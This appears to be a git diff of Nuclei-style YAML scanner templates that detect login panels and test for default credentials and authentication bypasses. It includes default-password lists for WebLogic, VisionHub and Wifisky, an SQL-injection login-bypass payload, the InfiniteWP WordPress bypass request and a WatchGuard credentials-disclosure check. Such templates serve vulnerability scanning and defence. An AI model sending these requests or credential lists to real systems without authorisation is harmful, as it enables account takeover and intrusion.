- author: dhiyaneshDK
- severity: info
- reference:
- - https://www.exploit-db.com/ghdb/6610
- tags: panel,login
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/weblogin.htm'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Vigor Login Page'
- - type: status
- status:
- - 200
diff --git a/poc/auth/vigor-login.yaml b/poc/auth/vigor-login.yaml
index ce4255d0e0..03be72a99c 100644
--- a/poc/auth/vigor-login.yaml
+++ b/poc/auth/vigor-login.yaml
@@ -1,33 +1,20 @@
id: vigor-login
-
info:
- name: Vigor Login Panel - Detect
+ name: Vigor Login Page
author: dhiyaneshDK
severity: info
- description: Vigor login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/6610
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0
- cwe-id: CWE-200
- metadata:
- max-request: 1
- tags: panel,login,edb
-
-http:
+ tags: panel,login
+requests:
- method: GET
path:
- '{{BaseURL}}/weblogin.htm'
-
matchers-condition: and
matchers:
- type: word
words:
- 'Vigor Login Page'
-
- type: status
status:
- 200
-
-# digest: 4a0a0047304502205205761ed678f220785057ddad4a3470cab519acf994a0f7637965f91815974e022100dede240fe0b532f162e2afb8126aae23440f7b7ecd7fb07f1f0088ea49341e86:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/visionhub-default-login-11026.yaml b/poc/auth/visionhub-default-login-11026.yaml
new file mode 100644
index 0000000000..a6ca0e922d
--- /dev/null
+++ b/poc/auth/visionhub-default-login-11026.yaml
@@ -0,0 +1,42 @@
+id: visionhub-default-login
+
+info:
+ name: VisionHub Default Login
+ author: Techryptic (@Tech)
+ severity: high
+ description: VisionHub application default admin credentials were discovered.
+ tags: visionhub,default-login
+ reference:
+ - https://www.qognify.com/products/visionhub/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cve-id:
+ cwe-id: CWE-522
+
+requests:
+ - raw:
+ - |
+ POST /VisionHubWebApi/api/Login HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic {{base64(username + ':' + password)}}
+
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+ attack: pitchfork
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Set-Cookie: admin"
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/13
diff --git a/poc/auth/visionhub-default-login-11027.yaml b/poc/auth/visionhub-default-login-11027.yaml
index f7409e95bc..0c32ed33aa 100644
--- a/poc/auth/visionhub-default-login-11027.yaml
+++ b/poc/auth/visionhub-default-login-11027.yaml
@@ -3,9 +3,15 @@ info:
name: VisionHub Default Login
author: Techryptic (@Tech)
severity: high
- description: Default Login of admin:admin on VisionHub application.
+ description: VisionHub application default admin credentials were discovered.
tags: visionhub,default-login
- reference: https://www.qognify.com/products/visionhub/
+ reference:
+ - https://www.qognify.com/products/visionhub/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cve-id:
+ cwe-id: CWE-522
requests:
- raw:
- |
@@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/13
diff --git a/poc/auth/vpms-auth-bypass-11066.yaml b/poc/auth/vpms-auth-bypass-11066.yaml
new file mode 100644
index 0000000000..342a13243b
--- /dev/null
+++ b/poc/auth/vpms-auth-bypass-11066.yaml
@@ -0,0 +1,33 @@
+id: vpms-auth-bypass
+info:
+ name: Vehicle Parking Management System 1.0 - Authentication Bypass
+ author: dwisiswant0
+ severity: high
+ reference: https://www.exploit-db.com/exploits/48877
+requests:
+ - raw:
+ - |
+ POST /login.php HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Content-Type: application/x-www-form-urlencoded
+ Referer: http://{{Hostname}}/login.php
+ Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8
+ Connection: keep-alive
+ Upgrade-Insecure-Requests: 1
+
+ email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "LAGOS PARKER"
+ - "Login Successfully"
+ - "location.href = 'index.php';"
+ condition: and
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/vpms-auth-bypass-11068.yaml b/poc/auth/vpms-auth-bypass-11068.yaml
deleted file mode 100644
index 2dd06d8a6a..0000000000
--- a/poc/auth/vpms-auth-bypass-11068.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: vpms-auth-bypass
-info:
- name: Vehicle Parking Management System 1.0 - Authentication Bypass
- author: dwisiswant0
- severity: high
- description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
- reference:
- - https://www.exploit-db.com/exploits/48877
- tags: auth-bypass
-requests:
- - raw:
- - |
- POST /login.php HTTP/1.1
- Host: {{Hostname}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Content-Type: application/x-www-form-urlencoded
- Referer: {{BaseURL}}/login.php
- Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8
-
- email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "LAGOS PARKER"
- - "Login Successfully"
- - "location.href = 'index.php';"
- condition: and
- part: body
- - type: status
- status:
- - 200
diff --git a/poc/auth/watchguard-credentials-disclosure-11107.yaml b/poc/auth/watchguard-credentials-disclosure-11107.yaml
index e0258cf0cb..cbaf48e75c 100644
--- a/poc/auth/watchguard-credentials-disclosure-11107.yaml
+++ b/poc/auth/watchguard-credentials-disclosure-11107.yaml
@@ -1,5 +1,4 @@
id: watchguard-credentials-disclosure
-
info:
name: WatchGuard Fireware AD Helper Component - Credentials Disclosure
author: gy741
@@ -9,18 +8,14 @@ info:
- https://www.exploit-db.com/exploits/48203
- https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10
+ cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
cwe-id: CWE-288
- metadata:
- max-request: 1
- tags: watchguard,disclosure,edb
-
-http:
+ tags: watchguard,disclosure
+requests:
- method: GET
path:
- "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"
-
matchers-condition: and
matchers:
- type: word
@@ -31,9 +26,8 @@ http:
- '"username"'
- '"password"'
condition: and
-
- type: status
status:
- 200
-# digest: 4b0a00483046022100f8e0d27df72b2fe1c8093387e92007e5eadff0eae03e14635e3b39fe8fbb075f022100ed19afcc7b593591a47321f72c10486386adef88bc1291e7383f92e98f0356f9:922c64590222798bb761d5b6d8e72950
+# Enhanced by mp on 2022/06/03
diff --git a/poc/auth/watchguard-credentials-disclosure-11106.yaml b/poc/auth/watchguard-credentials-disclosure.yaml
similarity index 100%
rename from poc/auth/watchguard-credentials-disclosure-11106.yaml
rename to poc/auth/watchguard-credentials-disclosure.yaml
diff --git a/poc/auth/weblogic-weak-login-11154.yaml b/poc/auth/weblogic-weak-login-11154.yaml
deleted file mode 100644
index 3cf788b3b9..0000000000
--- a/poc/auth/weblogic-weak-login-11154.yaml
+++ /dev/null
@@ -1,68 +0,0 @@
-id: weblogic-weak-login
-
-info:
- name: WebLogic Default Login
- author: pdteam
- description: WebLogic default login credentials were discovered.
- severity: high
- tags: default-login,weblogic
- reference:
- - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
- - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cve-id:
- cwe-id: CWE-522
-
-requests:
- - raw:
- - |
- GET /console/ HTTP/1.1
- Host: {{Hostname}}
-
- - |
- POST /console/j_security_check HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8
-
- attack: pitchfork
- payloads:
- username:
- - weblogic
- - weblogic
- - weblogic
- - weblogic
- - weblogic
- - admin
- - admin
- - system
-
- password:
- - weblogic
- - weblogic1
- - welcome1
- - Oracle@123
- - weblogic123
- - 12345678
- - security
- - password
-
- stop-at-first-match: true
- cookie-reuse: true
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - "/console/index.jsp"
- - "ADMINCONSOLESESSION"
- condition: and
-
- - type: status
- status:
- - 302
-
-# Enhanced by mp on 2022/03/14
diff --git a/poc/auth/weblogic-weak-login-11155.yaml b/poc/auth/weblogic-weak-login-11155.yaml
index 11d03f834a..454abb185f 100644
--- a/poc/auth/weblogic-weak-login-11155.yaml
+++ b/poc/auth/weblogic-weak-login-11155.yaml
@@ -1,18 +1,10 @@
id: weblogic-weak-login
info:
- name: WebLogic Default Login
+ name: WebLogic weak login
author: pdteam
- description: WebLogic default login credentials were discovered.
severity: high
tags: default-login,weblogic
- reference:
- - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
- - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cve-id:
- cwe-id: CWE-522
+ reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
requests:
- raw:
- |
@@ -57,5 +49,3 @@ requests:
- type: status
status:
- 302
-
-# Enhanced by mp on 2022/03/14
diff --git a/poc/auth/whm-login-detect.yaml b/poc/auth/whm-login-detect.yaml
index f775e034eb..d6050e6b3a 100644
--- a/poc/auth/whm-login-detect.yaml
+++ b/poc/auth/whm-login-detect.yaml
@@ -1,19 +1,33 @@
id: whm-login-detect
+
info:
- name: WHM Login Detect
+ name: WHM Login Panel - Detect
author: pussycat0x
severity: info
- reference: https://www.exploit-db.com/ghdb/7128
- tags: whm,panel,login
-requests:
+ description: WHM login panel was detected.
+ reference:
+ - https://www.exploit-db.com/ghdb/7128
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
+ tags: edb,whm,panel,login
+
+http:
- method: GET
path:
- "{{BaseURL}}/"
+
matchers-condition: and
matchers:
- type: word
words:
- "WHM Login"
+
- type: status
status:
- 200
+
+# digest: 4a0a0047304502207711c44e3c1405bc8ba5366c37fa1f888e17c98be33776c5f754c0181a0bce8c022100db98959e59176b58756868b13dce8deb60096e0190a226805f3a3800cdae3424:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/wifisky-default-password-11205.yaml b/poc/auth/wifisky-default-password-11205.yaml
deleted file mode 100644
index ece1a116da..0000000000
--- a/poc/auth/wifisky-default-password-11205.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: wifisky-default-password
-
-info:
- name: Wifisky Default Password
- author: pikpikcu
- severity: high
- tags: default-login,wifisky
-
-requests:
- - raw:
- - |
- POST /login.php?action=login&type=admin HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- X-Requested-With: XMLHttpRequest
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Connection: close
-
- username=admin&password=admin
-
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - "text/html"
- part: header
-
- - type: word
- words:
- - '"success":"true"'
- - '"data":'
- part: body
- condition: and
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/poc/auth/wifisky-default-password.yaml b/poc/auth/wifisky-default-password.yaml
index 96ffa805aa..58c4881478 100644
--- a/poc/auth/wifisky-default-password.yaml
+++ b/poc/auth/wifisky-default-password.yaml
@@ -1,21 +1,14 @@
id: wifisky-default-password
-
info:
name: Wifisky Default Password
author: pikpikcu
severity: high
tags: default-login,wifisky
-
requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
+ - raw:
- |
POST /login.php?action=login&type=admin HTTP/1.1
- Host: {{Subdomains}}
+ Host: {{Hostname}}
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
@@ -24,19 +17,16 @@ requests:
username=admin&password=admin
matchers-condition: and
matchers:
-
- type: word
words:
- "text/html"
part: header
-
- type: word
words:
- '"success":"true"'
- '"data":'
part: body
condition: and
-
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml b/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml
index c48d37c9e4..88121a97b7 100644
--- a/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml
+++ b/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml
@@ -1,40 +1,25 @@
id: wordpress-infinitewp-auth-bypass
-
info:
name: WordPress InfiniteWP Client Authentication Bypass
author: princechaddha
severity: critical
reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
tags: wordpress,auth-bypass,wp-plugin
-
requests:
- raw:
- |
GET /?author=1 HTTP/1.1
Host: {{Hostname}}
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
- Connection: close
-
- |
POST / HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Connection: close
- Upgrade-Insecure-Requests: 1
- Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
- ContentLength: 3537
_IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}}
-
redirects: true
-
extractors:
- type: regex
name: username
@@ -43,7 +28,6 @@ requests:
part: body
regex:
- 'Author:(?:[A-Za-z0-9 -\_="]+)?([A-Za-z0-9]+)<\/span>'
-
- type: regex
name: username
internal: true
@@ -51,19 +35,16 @@ requests:
part: header
regex:
- 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
-
matchers-condition: and
matchers:
- type: word
words:
- "wordpress_logged_in"
part: header
-
- type: word
words:
- ""
-
part: body
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml b/poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml
deleted file mode 100644
index ee41aa1a81..0000000000
--- a/poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml
+++ /dev/null
@@ -1,60 +0,0 @@
-id: wordpress-infinitewp-auth-bypass
-info:
- name: WordPress InfiniteWP Client Authentication Bypass
- author: princechaddha
- severity: critical
- reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
- tags: wordpress,auth-bypass,wp-plugin
-requests:
- - raw:
- - |
- GET /?author=1 HTTP/1.1
- Host: {{Hostname}}
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Accept-Language: en-US,en;q=0.9
- Connection: close
- - |
- POST / HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Connection: close
- Upgrade-Insecure-Requests: 1
- Cache-Control: max-age=0
- Content-Type: application/x-www-form-urlencoded
- ContentLength: 3537
-
- _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}}
- redirects: true
- extractors:
- - type: regex
- name: username
- internal: true
- group: 1
- part: body
- regex:
- - 'Author:(?:[A-Za-z0-9 -\_="]+)?([A-Za-z0-9]+)<\/span>'
- - type: regex
- name: username
- internal: true
- group: 1
- part: header
- regex:
- - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "wordpress_logged_in"
- part: header
- - type: word
- words:
- - ""
- part: body
- - type: status
- status:
- - 200
diff --git a/poc/auth/wordpress-login.yaml b/poc/auth/wordpress-login.yaml
index 0372801292..7fecc16e01 100644
--- a/poc/auth/wordpress-login.yaml
+++ b/poc/auth/wordpress-login.yaml
@@ -1,13 +1,23 @@
id: wordpress-login
+
info:
- name: WordPress login
+ name: WordPress Login Panel - Detect
author: its0x08
severity: info
+ description: WordPress login panel was detected.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
tags: panel,wordpress
-requests:
+
+http:
- method: GET
path:
- "{{BaseURL}}/wp-login.php"
+
matchers:
- type: word
words:
@@ -16,3 +26,5 @@ requests:
- '/wp-login.php?action=lostpassword">Lost your password?'
- '